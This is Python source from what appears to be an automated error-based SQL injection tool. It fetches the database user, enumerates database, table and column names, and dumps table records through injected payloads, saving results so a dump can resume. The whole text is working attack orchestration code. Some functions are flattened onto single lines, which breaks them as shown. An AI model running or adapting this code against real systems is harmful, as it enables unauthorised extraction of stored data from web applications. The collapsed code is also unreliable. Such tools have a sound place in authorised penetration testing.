def _extract_search_results(self, payloads, database="", table="", search_type="", records=None, position=0): _temp, index = [], 0 pos = position + 1 resumed = bool(records) Response = collections.namedtuple("Response", ["is_fetched", "result"]) while index < len(payloads): payload = payloads[index] if records: entry = records.pop() database = entry.database table = entry.table try: if search_type == "database": response = self._search_db(payload=payload, index=pos) _temp.append(response) if search_type == "table": response = self._search_table(payload=payload, index=pos, database=database) _temp.append(response) if search_type == "column": response = self._search_column(payload=payload, index=pos, database=database, table=table) _temp.append(response) except KeyboardInterrupt: logger.warning( "user aborted during enumeration. Xpath will display partial output" ) break index += 1 pos += 1 if resumed: database = "" table = "" if _temp: resp = Response(is_fetched=True, result=_temp) else: resp = Response(is_fetched=False, result=_temp) return resp
def user(self):
    """Fetch the current database user via error-based extraction.

    Builds the current-user payloads, attempts extraction, logs the outcome,
    and returns the raw extraction response so callers can inspect
    ``is_injected`` / ``result`` themselves.
    """
    user_payloads = self._generat_payload(payloads_list=PAYLOADS_CURRENT_USER)
    logger.info("fetching current user")
    response = self._extact(payloads=user_payloads)
    if response.is_injected:
        logger.info("retrieved: '%s'" % (response.result))
        logger.success(f"current user: '******'")
    else:
        code = response.status_code
        err = response.error
        tried = response.payloads_count
        if code not in [200, 0]:
            detail = f"{err} - {tried} times"
            logger.warning(f"HTTP error codes detected during run:\n{detail}")
        else:
            detail = (
                f"tested with '{tried}' queries, unable to find working SQL query."
            )
        logger.critical(detail)
    return response
def _extract_tbls(self, payloads, database=""): _temp, index = [], 0 Response = collections.namedtuple("Response", ["is_fetched", "result"]) while index < len(payloads): payload = payloads[index] payload_request = prepare_payload_request(self, payload) url = payload_request.url data = payload_request.data regex = payload_request.regex headers = payload_request.headers try: response = request.inject_payload(url=url, regex=regex, data=data, headers=headers, proxy=self._proxy) except KeyboardInterrupt: logger.warning( "user aborted during enumeration. Xpath will display partial output" ) break else: if response.ok: result = response.result logger.info("retrieved: '%s'" % (result)) _temp.append(result) retval = session.dump( session_filepath=self.session_filepath, query=TBLS_STATEMENT.format(tbl_name=database, tblname=result), ) index += 1 if _temp and len(_temp) > 0: _temp = list(set(_temp)) resp = Response(is_fetched=True, result=_temp) else: resp = Response(is_fetched=True, result=_temp) return resp
def search_regex(
    pattern,
    string,
    default=NO_DEFAULT,
    fatal=True,
    flags=0,
    group=None,
):
    """
    Perform a regex search on the given string, using a single or a list of
    patterns returning the first matching group. In case of failure return a
    default value or raise a WARNING or a RegexNotFoundError, depending on
    fatal, specifying the field name.
    """
    # BUGFIX: mobj was unbound (NameError) when `pattern` was an empty list;
    # initialise it so the no-match path is taken instead.
    mobj = None
    if isinstance(pattern, str):
        mobj = re.search(pattern, string, flags)
    else:
        for p in pattern:
            mobj = re.search(p, string, flags)
            if mobj:
                break
    if mobj:
        if group is None:
            # return the first matching group; default "" (-> "<blank_value>")
            # instead of raising StopIteration when every group is None
            value = next((g for g in mobj.groups() if g is not None), "")
        else:
            value = mobj.group(group)
        # strip leading opening parentheses leaked from the error payload
        value = re.sub(r"^\(+", "", value)
        if not value:
            value = "<blank_value>"
        value = value_cleanup(value)
        return value
    elif default is not NO_DEFAULT:
        return default
    elif fatal:
        # NOTE(review): docstring promises a RegexNotFoundError when fatal,
        # but both branches only warn; kept as-is to avoid changing callers.
        logger.warning("unable to filter out values..")
    else:
        logger.warning("unable to filter out values..")
def search(self, db="", tbl="", col="", search_type=""):
    """Search for database/table/column names matching the given LIKE terms.

    Args:
        db: database-name pattern.
        tbl: table-name pattern.
        col: column-name pattern.
        search_type: "database", "table" or "column" — selects the payload
            family, the per-row field count and the warning messages.

    Returns:
        SearchResponse(fetched, count, results) namedtuple.
    """
    index = 0
    _temp = []
    is_resumed = False
    fetched_data = {}
    SearchResponse = collections.namedtuple(
        "SearchResponse",
        ["fetched", "count", "results"],
    )
    # PostgreSQL is explicitly unsupported for search (typo in the runtime
    # message is preserved — changing it would change behavior).
    if self._dbms and self._dbms == "PostgreSQL":
        logger.warning(f"Search is not implemeted yet for PostgreSQL..")
        return SearchResponse(fetched=False, count=0, results=[])
    payloads = self._search_payloads(db=db, tbl=tbl, col=col, search_type=search_type)
    self._table_search = payloads.table_to_generate
    # Best-effort: try to load previously fetched rows from the session file;
    # any failure simply means we start fresh (error is deliberately ignored).
    try:
        fetched_data = session.fetch_from_table(
            session_filepath=self.session_filepath,
            table_name=self._table_search,
            cursor=False,
        )
        if fetched_data:
            is_resumed = True
    except Exception as error:
        pass
    remainder = 0
    # First run the COUNT query to learn how many entries exist.
    retval = self._extact(payloads=payloads.for_count)
    if retval.is_injected:
        found_records = int(retval.result)
        logger.info("used SQL query returns %d entries" % (found_records))
        if found_records == 0:
            # Nothing matched: emit the warning(s) specific to the search type.
            if search_type == "database":
                logger.warning(f"no databases LIKE '{db}' found")
            if search_type == "table":
                if not db:
                    logger.warning(f"no databases have tables LIKE '{tbl}'")
                if db:
                    logger.warning(f"no tables LIKE '{tbl}' in database '{db}'")
                logger.warning(f"no databases contain any of the provided tables")
            if search_type == "column":
                if not tbl and not db:
                    logger.warning(
                        f"no databases have tables containing columns LIKE '{col}'"
                    )
                if not tbl and db:
                    logger.warning(
                        f"no tables contain columns LIKE '{tbl}' in database '{db}'"
                    )
                if not db and tbl:
                    logger.warning(
                        f"no databases have tables containing columns LIKE '{col}' for table '{tbl}'"
                    )
                if db and tbl:
                    logger.warning(
                        f"unable to retrieve column names for table '{tbl}' in database '{db}'"
                    )
                logger.warning(
                    f"no databases have tables containing any of the provided columns"
                )
            return SearchResponse(fetched=False, count=0, results=[])
        if is_resumed:
            # Replay previously saved rows; `index` ends up at the last saved
            # position so fetching can continue from there.
            for entry in fetched_data:
                index = entry.get("index")
                name = entry.get("value")
                _type = entry.get("search_type")  # read but unused
                _temp.append(name)
                logger.info(f"resumed: {name}")
            # Number of raw fields per logical result row depends on type.
            if search_type == "column":
                remainder_value = 3
            if search_type == "table":
                remainder_value = 2
            if search_type == "database":
                remainder_value = 1
            # A non-zero remainder means the last row was only partially
            # fetched before the previous run stopped.
            remainder = len(fetched_data) % remainder_value
            fetched_records = _temp
            _temp = self._format_results(_temp, remainder_value)
            if remainder > 0:
                index -= 1
                fetched_records = fetched_records[-remainder:]
                _temp.pop()
        # `remainder` was initialised to 0 above, so on a fresh (non-resumed)
        # run this safely yields records = [].
        if remainder > 0:
            records = self._format_results(fetched_records, remainder_value)
        else:
            records = []
        should_fetch = True
        if is_resumed:
            if index == found_records:
                # session already holds every record — skip network fetching
                should_fetch = False
        if should_fetch:
            retval = self._extact(payloads=payloads.for_dump)
            if retval.is_injected:
                payload = retval.payload
                payloads = self._generate_search_dump_payloads(
                    count=found_records, payload=payload, index=index
                )
                if not is_resumed:
                    session.generate_table(
                        session_filepath=self.session_filepath,
                        query=TBL_SEARCH.format(name=self._table_search),
                    )
                response_data = self._extract_search_results(
                    payloads=payloads,
                    database=db,
                    table=tbl,
                    search_type=search_type,
                    records=records,
                    position=index,
                )
                if response_data.is_fetched:
                    _temp.extend(response_data.result)
                self._pprint_search_results(search_type, _temp)
                return SearchResponse(
                    fetched=True, count=found_records, results=_temp
                )
            if not retval.is_injected:
                status_code = retval.status_code
                error = retval.error
                count = retval.payloads_count
                if status_code not in [200, 0]:
                    message = f"{error} - {count} times"
                    logger.warning(
                        f"HTTP error codes detected during run:\n{message}"
                    )
                else:
                    message = f"tested with '{count}' queries, unable to find working SQL query."
                logger.critical(message)
        else:
            # Everything was already in the session: just print and return it.
            self._pprint_search_results(search_type, _temp)
            return SearchResponse(fetched=True, count=found_records, results=_temp)
    if not retval.is_injected:
        status_code = retval.status_code
        error = retval.error
        count = retval.payloads_count
        if status_code not in [200, 0]:
            message = f"{error} - {count} times"
            logger.warning(
                f"HTTP error codes detected during run:\n{message}")
        else:
            message = (
                f"tested with '{count}' queries, unable to find working SQL query."
            )
        logger.critical(message)
    return SearchResponse(fetched=False, count=0, results=[])
def tbl_names(self, db=""):
    """Enumerate table names of database ``db`` via error-based injection.

    Args:
        db: database name; when empty the enumeration body is skipped.

    Returns:
        TablesResponse(fetched, count, database, tables) namedtuple.
    """
    index = 0
    _temp = []
    is_resumed = False
    fetched_data = {}
    _temp_payloads = []
    TablesResponse = collections.namedtuple(
        "TablesResponse", ["fetched", "count", "database", "tables"])
    if db:
        # Start with every known payload template, then narrow to the
        # detected DBMS when available.
        dump_payloads = []
        [dump_payloads.extend(v) for _, v in PAYLOADS_TBLS_NAMES.items()]
        encode_string = to_hex(db, dbms=self._dbms)
        if self._dbms:
            dump_payloads = PAYLOADS_TBLS_NAMES.get(
                self._dbms, dump_payloads)
        for entry in dump_payloads:
            if self._dbms and self._dbms.startswith("Microsoft"):
                # sysobjects-based payloads take the raw name; others take
                # the hex-encoded form (both db/db1 slots).
                if "sysobjects" in entry:
                    data = entry.format(db=db.strip(), db1=db.strip())
                else:
                    data = entry.format(db=encode_string, db1=encode_string)
            else:
                data = entry.format(db=encode_string)
            _temp_payloads.append(data)
        # Best-effort resume: load already-fetched table names from the
        # session file; failures are deliberately ignored.
        try:
            fetched_data = session.fetch_from_table(
                session_filepath=self.session_filepath,
                table_name=db,
                cursor=False,
            )
            if fetched_data:
                is_resumed = True
        except Exception as error:
            pass
        logger.info("fetching tables for database: '%s'" % (db))
        retval = self._tbl_count(db=db)
        if retval.is_injected:
            tbl_count = int(retval.result)
            if tbl_count != 0:
                logger.info("used SQL query returns %d entries" % (tbl_count))
            if tbl_count == 0:
                logger.warning(
                    "used SQL query returns %d entries for database: '%s'"
                    % (tbl_count, db))
                return TablesResponse(
                    fetched=False, count=tbl_count, database=db, tables=[])
            if is_resumed:
                # Replay saved names; `index` counts processed session rows
                # and becomes the resume offset for payload generation.
                for entry in fetched_data:
                    name = entry.get("tblname")
                    if name not in _temp:
                        _temp.append(name)
                        logger.info(f"resumed: '{name}'")
                    index += 1
            should_fetch = True
            if is_resumed:
                if len(fetched_data) == tbl_count:
                    # session already complete — skip network fetching
                    should_fetch = False
            if should_fetch:
                payloads = self._generat_payload(payloads_list=_temp_payloads)
                retval = self._extact(payloads=payloads)
                if retval.is_injected:
                    payload = retval.payload
                    payloads = self._generate_tbl_payloads(
                        tbl_count=tbl_count, payload=payload, index=index)
                    if not is_resumed:
                        session.generate_table(
                            session_filepath=self.session_filepath,
                            query=DB_TABLES.format(name=db, tbl_name=db),
                        )
                    response_data = self._extract_tbls(payloads=payloads, database=db)
                    if response_data.is_fetched:
                        _temp.extend(response_data.result)
                    self._pprint_tables(
                        cursor_or_list=_temp,
                        field_names="Tables",
                        database=db,
                    )
                    return TablesResponse(
                        fetched=True, count=tbl_count, database=db, tables=_temp)
                if not retval.is_injected:
                    status_code = retval.status_code
                    error = retval.error
                    count = retval.payloads_count
                    if status_code not in [200, 0]:
                        message = f"{error} - {count} times"
                        logger.warning(
                            f"HTTP error codes detected during run:\n{message}"
                        )
                    else:
                        message = f"tested with '{count}' queries, unable to find working SQL query."
                    logger.critical(message)
            else:
                # Nothing left to fetch: print the resumed names and return.
                self._pprint_tables(
                    cursor_or_list=_temp,
                    field_names="Tables",
                    database=db,
                )
                return TablesResponse(
                    fetched=True, count=tbl_count, database=db, tables=_temp)
        if not retval.is_injected:
            status_code = retval.status_code
            error = retval.error
            count = retval.payloads_count
            if status_code not in [200, 0]:
                message = f"{error} - {count} times"
                logger.warning(
                    f"HTTP error codes detected during run:\n{message}")
            else:
                message = (
                    f"tested with '{count}' queries, unable to find working SQL query."
                )
            logger.critical(message)
    # Fallback for all remaining paths (including empty `db`).
    return TablesResponse(fetched=False, count=0, database="", tables=_temp)
def dbs_names(self):
    """Enumerate available database names via error-based injection.

    Returns:
        DatabasesResponse(fetched, count, databases) namedtuple.
    """
    is_resumed = False
    index = 0
    fetched_data = {}
    _temp = []
    DatabasesResponse = collections.namedtuple(
        "DatabasesResponse", ["fetched", "count", "databases"])
    # Best-effort resume from the session file; failures are ignored and
    # enumeration starts fresh.
    try:
        fetched_data = session.fetch_from_table(
            session_filepath=self.session_filepath,
            table_name="tbl_databases",
            cursor=False,
        )
        if fetched_data:
            is_resumed = True
    except Exception as error:
        pass
    logger.info("fetching database names")
    # NOTE(review): attribute access, not a call — presumably `_dbs_count`
    # is a property (siblings call `_tbl_count(...)`); verify in the class.
    retval = self._dbs_count
    if retval.is_injected:
        dbs_count = int(retval.result)
        if dbs_count != 0:
            logger.info("used SQL query returns %d entries" % (dbs_count))
        if dbs_count == 0:
            logger.warning(
                "used SQL query returns %d entries for database names.."
                % (dbs_count))
            return DatabasesResponse(fetched=False, count=dbs_count, databases=[])
        if is_resumed:
            # Replay saved names; `index` counts processed session rows and
            # becomes the resume offset for payload generation.
            for entry in fetched_data:
                name = entry.get("dbname")
                if name not in _temp:
                    _temp.append(name)
                    # logger.info(f"resumed: '{name}'")
                index += 1
        should_fetch = True
        if is_resumed:
            if len(fetched_data) == dbs_count:
                # session already complete — skip network fetching
                should_fetch = False
        if should_fetch:
            payloads = self._generat_payload(
                payloads_list=PAYLOADS_DBS_NAMES)
            retval = self._extact(payloads=payloads)
            if retval.is_injected:
                payload = retval.payload
                payloads = self._generate_dbs_payloads(
                    dbs_count=dbs_count, payload=payload, index=index)
                response_data = self._extract_dbs(payloads=payloads)
                if response_data.is_fetched:
                    _temp.extend(response_data.result)
                self._available_dbs(dbs_count, _temp)
                return DatabasesResponse(
                    fetched=True, count=dbs_count, databases=_temp)
            if not retval.is_injected:
                status_code = retval.status_code
                error = retval.error
                count = retval.payloads_count
                if status_code not in [200, 0]:
                    message = f"{error} - {count} times"
                    logger.warning(
                        f"HTTP error codes detected during run:\n{message}"
                    )
                else:
                    message = f"tested with '{count}' queries, unable to find working SQL query."
                logger.critical(message)
        else:
            # Nothing left to fetch: print the resumed names and return.
            self._available_dbs(dbs_count, _temp)
            return DatabasesResponse(fetched=True, count=dbs_count, databases=_temp)
    if not retval.is_injected:
        status_code = retval.status_code
        error = retval.error
        count = retval.payloads_count
        if status_code not in [200, 0]:
            message = f"{error} - {count} times"
            logger.warning(
                f"HTTP error codes detected during run:\n{message}")
        else:
            message = (
                f"tested with '{count}' queries, unable to find working SQL query."
            )
        logger.critical(message)
    return DatabasesResponse(fetched=False, count=0, databases=_temp)
def data_dump(self, db="", tbl="", cols=""):
    """Dump records of the given columns for ``db``.``tbl``.

    Args:
        db: database name.
        tbl: table name.
        cols: column names (cleaned into a list by ``_clean_up_cols``).

    Returns:
        RecordsResponse(fetched, count, database, table, columns, records)
        namedtuple.
    """
    index = 0
    _temp = []
    is_resumed = False
    fetched_data = {}
    _temp_payloads = []
    fetched_records = []
    cols = self._clean_up_cols(cols)
    # zero-padded column count, used as prefix for session table names
    count = "{0:03d}".format(len(cols))
    RecordsResponse = collections.namedtuple(
        "RecordsResponse",
        ["fetched", "count", "database", "table", "columns", "records"],
    )
    if db and tbl and cols and isinstance(cols, list):
        # Start with every known payload template, then narrow to the
        # detected DBMS when available.
        dump_payloads = []
        [dump_payloads.extend(v) for _, v in PAYLOADS_RECS_DUMP.items()]
        # placeholder column value used to probe a working payload
        test_column = "0x72306f746833783439"
        if self._dbms:
            dump_payloads = PAYLOADS_RECS_DUMP.get(self._dbms, dump_payloads)
            # presumably a plain numeric probe for DBMSes where the hex
            # literal form is unsuitable — TODO confirm placement
            test_column = "1337"
        for i in dump_payloads:
            data = i.format(col=test_column, db=db, tbl=tbl)
            _temp_payloads.append(data)
        # Best-effort resume from the per-table temp session table;
        # failures are ignored and the dump starts fresh.
        try:
            tmp_table_name = f"{count}_{tbl.strip()}_tmp"
            fetched_data = session.fetch_from_table(
                session_filepath=self.session_filepath,
                table_name=tmp_table_name,
                group_by_columns="`index`,`column_name`,`column_value`",
                cursor=False,
            )
            if fetched_data:
                is_resumed = True
        except Exception as error:
            pass
        logger.info(
            "fetching column(s) '%s' for table '%s' in database: '%s'"
            % (", ".join(cols), tbl, db))
        last_seen = 0
        remainder = 0
        retval = self._data_count(db=db, tbl=tbl)
        if retval.is_injected:
            data_count = int(retval.result)
            if data_count != 0:
                logger.info("used SQL query returns %d entries" % (data_count))
            if data_count == 0:
                logger.warning(
                    "used SQL query returns %d entries of columns '%s' for table '%s' in database '%s'"
                    % (data_count, ", ".join(cols), tbl, db))
                return RecordsResponse(
                    fetched=False,
                    count=data_count,
                    database=db,
                    table=tbl,
                    columns=cols,
                    records=[],
                )
            if is_resumed:
                # Replay saved cell values; `index`/`last_seen` track the
                # last saved record index so fetching can continue there.
                _temp = fetched_data
                for entry in fetched_data:
                    last_seen = index = entry.get("index")
                    value = entry.get("column_value")
                    # logger.info(f"resumed: '{value}'")
                    fetched_records.append(value)
                # Non-zero remainder means the last record was only partially
                # fetched (fewer cells saved than columns per record).
                remainder = len(fetched_data) % len(cols)
                if remainder > 0:
                    index -= 1
                    last_seen = last_seen - 1
                    fetched_records = fetched_records[-remainder:]
            should_fetch = True
            if is_resumed:
                if index == data_count:
                    # session already holds every record — skip fetching
                    should_fetch = False
            if should_fetch:
                # logger.info(f"resumed fetching from '{index+1}' record..")
                payloads = self._generat_payload(payloads_list=_temp_payloads)
                retval = self._extact(payloads=payloads)
                if retval.is_injected:
                    payload = clean_up_payload(
                        payload=retval.payload, replace_with="{col}")
                    payloads = self._generate_data_payloads(
                        data_count=data_count,
                        payload=payload,
                        cols=cols,
                        index=index)
                    if is_resumed and remainder > 0:
                        # drop the already-fetched cells of the partially
                        # saved record from its payload list
                        remaing_records = payloads[last_seen][remainder:]
                        payloads.update({last_seen: remaing_records})
                    if not is_resumed:
                        self.__generate_records_tables(tbl=tbl, cols=cols, count=count)
                    response_data = self._extract_data(
                        payloads=payloads,
                        table=tbl,
                        columns=cols,
                        fetched_records=fetched_records,
                        count=count,
                    )
                    if response_data.is_fetched:
                        _temp.extend(response_data.result)
                    table_name = f"{count}_{tbl}_data"
                    self._pprint_records(
                        field_names=", ".join(cols),
                        database=db,
                        table_name=table_name,
                        table=tbl,
                        columns=cols,
                    )
                    return RecordsResponse(
                        fetched=True,
                        count=data_count,
                        database=db,
                        table=tbl,
                        columns=cols,
                        records=_temp,
                    )
                if not retval.is_injected:
                    status_code = retval.status_code
                    error = retval.error
                    # NOTE(review): this clobbers the zero-padded column
                    # count computed above; harmless here only because this
                    # path never builds a "{count}_{tbl}_data" name after it.
                    count = retval.payloads_count
                    if status_code not in [200, 0]:
                        message = f"{error} - {count} times"
                        logger.warning(
                            f"HTTP error codes detected during run:\n{message}"
                        )
                    else:
                        message = f"tested with '{count}' queries, unable to find working SQL query."
                    logger.critical(message)
            else:
                # Nothing left to fetch: print the resumed records and return.
                table_name = f"{count}_{tbl}_data"
                self._pprint_records(
                    field_names=", ".join(cols),
                    database=db,
                    table_name=table_name,
                    table=tbl,
                    columns=cols,
                )
                return RecordsResponse(
                    fetched=True,
                    count=data_count,
                    database=db,
                    table=tbl,
                    columns=cols,
                    records=_temp,
                )
        if not retval.is_injected:
            status_code = retval.status_code
            error = retval.error
            count = retval.payloads_count
            if status_code not in [200, 0]:
                message = f"{error} - {count} times"
                logger.warning(
                    f"HTTP error codes detected during run:\n{message}")
            else:
                message = (
                    f"tested with '{count}' queries, unable to find working SQL query."
                )
            logger.critical(message)
    return RecordsResponse(
        fetched=False,
        count=0,
        database=None,
        table=None,
        columns=None,
        records=None,
    )
def _extract_data(self, payloads, table=None, columns=None, fetched_records=None, count=None):
    """Extract record cells for each payload group and persist them.

    Args:
        payloads: mapping of record index -> list of {"column", "payload"}
            dicts (one payload per column of that record).
        table: table name, used to build the session temp-table name.
        columns: column names, forwarded to ``_save_records``.
        fetched_records: cell values already recovered for a partially
            fetched record (resume support).
        count: zero-padded column-count prefix for session table names.

    Returns:
        Response(is_fetched, result) namedtuple; ``result`` is a list of
        {"index", "column_name", "column_value"} dicts.
    """
    _temp, is_interrupted = [], False
    Response = collections.namedtuple("Response", ["is_fetched", "result"])
    for index, values in payloads.items():
        # NOTE(review): when fetched_records is non-empty this aliases the
        # SAME list across every record index (it keeps growing) — presumably
        # intentional so _save_records sees the accumulated row; confirm.
        __temp = [] if not fetched_records else fetched_records
        position = 0
        while position < len(values):
            p = values[position]
            name = p.get("column")
            payload = p.get("payload")
            payload_request = prepare_payload_request(self, payload)
            url = payload_request.url
            data = payload_request.data
            regex = payload_request.regex
            headers = payload_request.headers
            try:
                response = request.inject_payload(
                    url=url,
                    regex=regex,
                    data=data,
                    headers=headers,
                    proxy=self._proxy,
                )
            except KeyboardInterrupt:
                logger.warning(
                    "user aborted during enumeration. Xpath will display partial output"
                )
                is_interrupted = True
                break
            else:
                if response.ok:
                    result = response.result
                    # blank sentinel values are logged as empty strings
                    logger.info(
                        "retrieved: '%s'"
                        % (result if result != "<blank_value>" else ""))
                    _temp.append({
                        "index": index + 1,
                        "column_name": name,
                        "column_value": result,
                    })
                    __temp.append(result)
                    # persist each cell immediately so the dump can resume
                    table_name = f"{count}_{table}_tmp"
                    PREPARED_STATEMENT = f"INSERT INTO `{table_name}` (`index`, `column_name`, `column_value`) VALUES (?, ?, ?);"
                    retval = session.dump(
                        session_filepath=self.session_filepath,
                        query=PREPARED_STATEMENT,
                        values=(index + 1, name, result),
                    )
                position += 1
        # save whatever was collected for this record (even partial rows)
        _ = self._save_records(
            table=table, column_names=columns, records=__temp, count=count)
        if is_interrupted:
            break
    if _temp and len(_temp) > 0:
        resp = Response(is_fetched=True, result=_temp)
    else:
        resp = Response(is_fetched=False, result=_temp)
    return resp